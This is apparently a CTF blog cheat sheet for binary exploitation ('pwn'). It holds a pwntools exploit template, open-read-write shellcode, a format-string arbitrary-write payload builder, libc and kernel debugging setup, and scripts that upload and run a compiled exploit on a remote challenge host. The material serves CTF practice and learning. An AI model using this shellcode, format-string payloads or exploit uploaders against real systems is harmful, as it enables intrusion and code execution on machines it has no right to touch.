---
title: pwn部分命令和脚本
date: 2022-07-20 17:54:59 +0800
categories: [ctf比赛]
tags: [pwn, ctf]
permalink: /posts/id=35/
pin: false
published:
---
template

```python
# _*_ coding:utf-8 _*_
from pwn import *
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

context.log_level = "debug"
context.arch = "amd64"
# context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0','--title', 'gdb', 'bash', '-c']
context.terminal = ['tmux', 'splitw', '-h']

# p = remote("","")
# p = process('./ld-2.33.so ./TinyNote'.split(),env={'LD_PRELOAD':'./libc-2.33.so'})
p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

ia()
```

orw assemly syntax

```c
;// orw
    mov eax, 0x67616c66 ;// flag
    push rax

    mov rdi, rsp
    xor eax, eax
    mov esi, eax
    mov al, 2
    syscall ;// open

    push rax
    mov rsi, rsp
    xor eax, eax
    mov edx, eax
    inc eax
    mov edi, eax
    mov dl, 8
    syscall ;// write open() return value

    pop rax
    test rax, rax
    js over

    mov edi, eax
    mov rsi, rsp
    mov edx, 0x01010201
    sub edx, 0x01010101
    xor eax, eax
    syscall ;// read

    mov edx, eax
    mov rsi, rsp
    xor eax, eax
    inc eax
    mov edi, eax
    syscall ;// write

over:
    xor edi, edi
    mov eax, 0x010101e8
    sub eax, 0x01010101
    syscall ;// exit
```
orw by using shellcraft(需要设置架构)

```python
# orw
orw_payload = shellcraft.open('/flag')
orw_payload += shellcraft.read(3,'rsp',0x100)
orw_payload += shellcraft.write(1,'rsp',0x100)
```

arch

```python
['aarch64', 'alpha', 'amd64', 'arm', 'avr',
 'cris', 'i386', 'ia64', 'm68k', 'mips', 
 'mips64', 'msp430', 'none', 'powerpc', 'powerpc64',
 'riscv', 's390', 'sparc', 'sparc64', 'thumb', 'vax']
```

random number

```python
# 随机数调用
from ctypes import *
libc1 = cdll.LoadLibrary('./libc-2.31.so')
libc1.srand(0)
j = str((libc1.rand()+1)%3)
```

fmtstr script

```python
# 格式化字符串，任意地址改任意值
# 主要是fmt+addr的形式，通常修改也是一个字节一个字节地修改
# e.g:前提是有栈地址
# 这里的目标是利用一个printf，构造一个长的payload，实现修改printf——ret 以及 栈上的一个值
fmt = ""
addr_data = ""
pre = 0

# 这里想把栈上残留stdout的地址的低位修改，使其变为其fileno字段的地址
con = [0x10,0x37]# fileno字段的低地址
addr = [stack-0x140,stack-0x140+1]

# 又例如想把printf函数的返回地址改为start函数，实现循环
start_addr = xxx # start函数地址
for i in range(6):
    con.append(start_addr&0xff)
    addr.append(stack-0x1c8+i)# stack-0x1c8 == printf_ret
    start_addr = start_addr>>8

#-----------------------------------------------
# 按字节大小从小到大修改，避免差值为负数
for i in range(8):
    num = 0xffff
    for j in range(8):
        if (con[j] < num):# 取小值
            num = con[j]
            idx = j
    fmt += "%"+str(num-pre)+"c%"+str(i+22)+"$hhn"
    addr_data += p64(addr[idx])
    con[idx] = 0xff # 构造完成的就置0xff
    pre = num

payload = (fmt.ljust(0x80,"\x00")+addr_data).ljust(0x200,"\x00")
```
fmtstr by using tool
````python
# fmtstr_payload
# 这里目标是 修改上面在栈上布置好的fileno为2 and 泄露libc and 修改返回地址为start

# 题目输入偏移是6，fmtstr_payload开始的地方偏移是9
# stack-0x2a8 == ret_addr
# numbwritten: fmtstr_payload用%c构成读入字节数，这里fmtstr_payload前边有内容所以要剪掉字节长，%2c为2字节
payload ="%2c%310$hhn;%310$p".ljust(0x18)
payload += fmtstr_payload(9,{stack-0x2a8:start}, numbwritten=0x17)
````

libc environment configration

```bash
# 解压libc-dbg库
./extract debs/libc6_2.23-0ubuntu11.2_amd64.deb libs/2.23-0ubuntu11.2_amd64
./extract debs/libc6-dbg_2.23-0ubuntu11.2_amd64.deb libs/2.23-0ubuntu11.2_amd64/.debug


# 高版本环境配置
patchelf --set-interpreter ~/Desktop/ld-linux-x86-64.so.2 --set-rpath ~/Desktop/ qwarmup

patchelf --set-interpreter /home/ef4tless/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/ld-linux-x86-64.so.2 --set-rpath /home/ef4tless/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/ pwn

# 解压.build
cd /usr/lib/debug
sudo mv .build-id/ .build-id.bak
cd ~
sudo mv ~/.build-id/ /usr/lib/debug

# kernal gdb
cat /sys/module/test1/sections/.data
0xffffffffc00003e0
cat /sys/module/test1/sections/.text
0xffffffffc0000000
cat /sys/module/test1/sections/.bss
0xffffffffc0000800

gdb vmlinux 
# add-symbols-file 漏洞文件 程序基地址（lsmod）
add-symbol-file ./core/test1.ko 0xffffffffc0000000 -s .bss 0xffffffffc0000800 -s .data 0xffffffffc00003e0
target remote localhost:2222

# 寻找cred结构体大小的方法
cat /proc/kallsyms |grep "cred_init"
ffffffff81faf12a T cred_init


# kernal search gadget
ropper -f vmlinux --nocolor > g1.txt
grep 'pop rdi; ret;' g1.txt

```

startvm.sh

```bash
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \
-gdb tcp::2222 
```



一次性上传脚本

```python
# -*- coding: utf-8 -*-
from pwn import *
import os

# context.log_level = 'debug'
cmd = '$ '


def exploit(r):
    r.sendlineafter(cmd, 'stty -echo')
    os.system('musl-gcc  -static -O2 ./poc/exp.c -o ./poc/exp -masm=intel')
    os.system('gzip -c ./poc/exp > ./poc/exp.gz')
    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64')
    r.sendline((read('./poc/exp.gz')).encode('base64'))
    r.sendline('EOF')
    r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
    r.sendlineafter(cmd, 'gunzip ./exp.gz')
    r.sendlineafter(cmd, 'chmod +x ./exp')
    r.sendlineafter(cmd, './exp')
    r.interactive()


# p = process('./startvm.sh', shell=True)
p = remote('nc.eonew.cn',10100)

exploit(p)
```

分段上传

```python
# -*- coding: utf-8 -*-
from pwn import *
import base64

context.log_level = 'debug'
os.system("musl-gcc exp.c -o exp --static")
sh = remote('127.0.0.1',5555)
 
f = open('./exp','rb')
content = f.read()
total = len(content)
f.close()
per_length = 0x200;
sh.sendlineafter('$ ','touch /tmp/exploit')
for i in range(0,total,per_length):
   bstr = base64.b64encode(content[i:i+per_length])
   sh.sendlineafter('$ ','echo {} | base64 -d >> /tmp/exploit'.format(bstr))
if total - i > 0:
   bstr = base64.b64encode(content[total-i:total])
   sh.sendlineafter('$ ','echo {} | base64 -d >> /tmp/exploit'.format(bstr))
 
sh.sendlineafter('$ ','chmod +x /tmp/exploit')
sh.sendlineafter('$ ','/tmp/exploit')
 
sh.interactive()
```

